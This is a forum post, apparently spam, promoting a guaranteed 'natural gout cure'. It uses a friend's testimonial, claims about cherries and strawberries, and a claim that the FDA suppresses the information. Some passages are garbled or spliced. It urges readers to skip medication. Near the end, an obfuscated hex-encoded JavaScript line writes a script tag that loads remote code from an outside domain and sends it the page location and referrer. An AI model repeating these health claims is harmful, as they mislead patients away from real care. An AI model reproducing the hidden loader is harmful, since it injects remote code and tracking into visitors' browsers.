remedies for gout

Answers about home remedy gout

You are not connected. Please login or register

What is Blood Uric Acid: Therapeutic Uses of Honey

Go down  Message [Page 1 of 1]

Admin

Admin

What is Blood Uric Acid

Few years ago, my friend Greg approached me about his arthritic problem of gout! He told me about his daily battle with the pain associated with gout! He also mentioned how going to bed (typically when a gout attack occurs) was more like a chore than a pleasure! Can you relate with Greg? The pain, the misery, the dread of the next attack! Or do you know a loved one who suffers from this painful disease? Embarassed

Gout can be a Life and Death Ailment If Left Untreated!

I immediately made a phone call to Greg to check up! Greg followed our simple Natural Gout Cure and cured his gout, lost over 20 pounds and his blood pressure was over 15 points lower! I jokingly told him that he will be our 'cure gout poster child'.

• How did he do it?
  • He was pro-active about curing gout and began living a healthy lifestyle!
  • And you can too! A Natural Gout Cure- No mediations needed and NO side-effects
  • ) Avoid or limit Alcohol Consumption. ) Exercise on a daily basis!
  • Try to get at least 15 minutes of activity per day.

Here is a list of some basic tips if you or a loved one is suffering from gout! ) Maintain Your Healthy Weight! ) Avoid Eating Meats (Purines)! Wink

And the Kicker!

Men with gout were about 50% more likely to die from an acute heart attack than those men without gout! With millions of gout hospital visits each year, and over 500,000 coronary deaths per year... Can you understand the seriousness of gout?

• Do you want a simple step-by-step natural gout cure treatment that is guaranteed to work?
  • Are you sick of popping pills to 'band-aid' the pain?

Do You Want to Discover a Simple 'Kitchen Cupboard' Cure that Works in Minutes?

If you answered 'yes' to any of these questions, please take a few moments to check out our Natural Gout Cure Website and our NO-RISK guarantee! I would love to help you get your life back, cure your gout and possibly save your life!

Let Me Explain!

Curing Gout and Decreasing Your Chance of Heart Disease My career is centered around health! Therefore, my favorite part of the newspaper is the 'Health' Section. And while reading the daily paper, I noticed an article about gout! "Gout Increases Risk of Coronary Heart Disease". I instantly flipped the page and thought 'duh'. But, after thinking about my friend Greg, his family, our friendship, his life... I immediately flipped back and read the interesting article!

You know anything about gout, you would guess that Greg was the perfect candidate for this arthritic condition. Greg was 30 pounds overweight, had a sedentary lifestyle (a sitting job), didn't exercise, typically ate high carb/fat meals, loved his beer and was 38 years old. I later realized, I probably could have approached him about wanting to try our natural gout cure as opposed to him coming to me. Smile

But like Greg (who has been gout free for almost 8 months now), you can naturally cure gout with simple gout remedies and gout prevention cures! And an added bonus, if you live a gout free lifestyle, I guarantee that you will lose weight and decrease your chance of heart disease in the process.

And finally, if you want to follow the same path that Greg and hundreds of other ex-gout sufferers followed, please take a few seconds to consider:

• ) Drink half your weight in water!
  • In ounces that is!
  • I weight 180 pounds so I would drink 90 ounces of water per day!
  • Roughly, 11 cups of water per day!

European study reported a 16 year follow-up of over 9,000 men between 41 and 63 who entered the study with no evidence of coronary heart disease (CHD). After the study follow-up, most men continued to different kinds of gout causes but also were considered high risk for coronary heart disease. And as you might know, 1 out of every 5 deaths is associated with heart disease.

Cherries Have Had a Long History of Being Described as the "the Healing Fruit"

Just as cranberries prevent urinary tract infections and an apple-a-day can keep the doctor away, tart cherries are known to stop gout and www arthritis gout details. But if tart cherries are so good, why haven't you heard more about them? Well first, the FDA doesn't want you to know.

Fact, just a few years ago the FDA threatened over two dozen cherries companies for sharing information on the research conducted by the USDA how cherries help fight gout and joint pain. So much for freedom of speech in America. This is something similar to what happened to the cranberry sellers several years ago. They were also threatened. But look at it today, research shows that cranberries can fight urinary tract infections. Thanks for the freedom of speech in America.

• Addition to fresh cherries and cherry drinks you can also choose from tart cherry juice concentrate and tart cherry capsules.
  • One of the benefits of tart cherry juice concentrate is it takes approximately 100 cherries to make just one ounce of tart cherry juice.
  • So the tart cherry juice is a highly concentrated way to get your daily dose of cherries. www.traversebayfarms.com

Tart Cherry Capsules are Another Way to Get Tart Cherries

Tart cherry capsules are made with tart cherry powder. The tart cherry powder is made using the freeze-dried process. The freeze dried process is one of the best ways to get tart cherry powder. The reason is the freeze-dried process captures 100% of the nutritional value of the tart cherry. Surprised.

Addition to fighting joint pain, research also shows tart cherry juice helps to soothe sore muscles due to physical exercise. According to a study published in the British Journal of Medicine in June 2006, found that a drink made with tart cherry juice proved effective in reducing exercise-caused muscle pain and exercise-induced strength loss. The study was conducted on college athletes and the results basically found that the tart cherry drink helped to reduce pain and strength loss when compared to the placebo.

• Secondly, although tart cherries have been studied for years, no real effort was ever really made to promote the health benefits of the tart cherry.
  • However, the cherry growers are really getting the word out about cherries to the world. Evil or Very Mad

What is Blood Uric Acid: Therapeutic Uses of Honey  Uricacidanalyzersure4

Uric Acid Gout

• Could there be a nicer way of beating gout than by eating a couple of bowls of strawberries a day?
  • They are, after all, one of the world's most lovedand delicious fruits.
  • So is this idea, which is quite well known in the world of gout treatment, a myth or magic?
  • What does the evidence amount to?

Some studies have shown that Vitamin C does reduce uric acid levels, which makes Vitamin C for gout a good idea. In these studies the lowest amount required to do this was 500 mg daily. It's not hard to get 500 mg of Vitamin C naturally from foods and drinks.

A GOUT POSITIVE NUTRITIONAL PROFILE It is true that the nutritional profile of strawberries is positive for natural gout treatment. Probably the most important fact is their high Vitamin C content, around 59 mg per 100 grams of fruit. This puts them towards the top of the high-in-Vitamin C fruits' tables. Way above cherries. They are moderately alkaline, alkaline neutral or just mildly acidic so their effect on the body's pH amounts is not likely to be much, and may be mildly positive. They contain about 91% water, are low purine and moderate on the Glycemic Index. Dallas theological seminary them a good gout food.

• There is one more health positive fact about strawberries.
  • Their proanthocyanidin (abbreviated as PCO's or OPC's) levels are high, much higher than in cherries.

And because their flavonoids amounts are high, their flavonoids-to-Vitamin C ratio is pretty good which means that their Vitamin C is likely to be better absorbed and thus have a stronger therapeutic effect. Very Happy

• Modern real world testimonials to the value of strawberries in gout treatment can be read on the Internet.
  • And for pain alleviation too.
  • Of course you can also read that strawberries had no effect. Evil or Very Mad

Strawberries' Flavonoids are Anthocyanidins, Flavan-3-Ols and Flavonols

Quercetin, which has been thought to reduce uric acid levels, is a flavonol. There is some Quercetin in strawberries. Thinking of what to do upon reading this article on Natural Gout Treatment? Well you can very well use the information constructively by imparting it to others.

It's a Pity that More Isn't Known about Strawberries for Gout

But all these hints and signs, and in the case of Vitamin C for gout, studies too, do suggest that a daily bowl of strawberries is a good idea for a gout diet, especially when combined with other natural remedies for gout.

The most quoted historical character who advocated strawberries for gout was the Swedish botanist Carl Linnaeus (1707- . He said that his strawberries-only diet had cured or alleviated what is gout?. Accounts vary as to what he precisely said, but there is no doubt that he thought strawberries were helpful, and in his time he was a famous and respected botanist. So he knew a lot about strawberries. But don't eat a strawberries-only diet. This is a crash diet and crash diets are now thought to probably increase gout attacks. You can easily get strawberries into a low purine gout diet. Or into a carbohydrate restricted diet, such as the Zone diet, because they are moderate on the Glycemic Index. Rolling Eyes

STRAWBERRY TESTIMONIALS If you're looking for a natural gout remedy, and which gout sufferer isn't, all this is very interesting, but are there any real world testimonials?

var c2="gout";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

https://cortezz.forumotion.com

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum